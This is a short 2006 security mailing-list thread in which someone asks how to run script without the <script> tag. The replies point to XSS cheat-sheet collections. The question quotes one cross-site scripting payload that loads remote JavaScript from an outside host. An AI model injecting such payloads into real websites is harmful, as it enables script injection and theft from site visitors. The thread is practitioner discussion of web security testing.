Re: XSS - how to run script

["pdp (architect)" <pdp.gnucitizen () googlemail com>]

RSnake's library is available here as well

http://www.gnucitizen.org/xssdb/

On 10/20/06, A. R. <r00t () northernfortress net> wrote:
> One of the best repositories of exotic ways to perform XSS (with or
> without evasion, with or without script tag) is the XSS cheat sheet:
> http://ha.ckers.org/xss.html
>
> hth
>
> --
> icesurfer
>
> Tal Argoni wrote:
> > Does anyone have any
> > techniques/knowledge/examples/ideas/etc
> > of how it possible to run script
> > without using the <script> tag,
> > and without evasion techniques ?
> > <script
> > src=http://www.www.com/XSS.js></script>
> > Thanks allot
> > LegendaryZion
> >
> >
> >
> > ------------------------------------------------------------------------
> > This List Sponsored by: Cenzic
> >
> > Need to secure your web apps?
> > Cenzic Hailstorm finds vulnerabilities fast.
> > Click the link to buy it, try it or download Hailstorm for FREE.
> > http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> > ------------------------------------------------------------------------
> >
> >
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
> http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------


--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------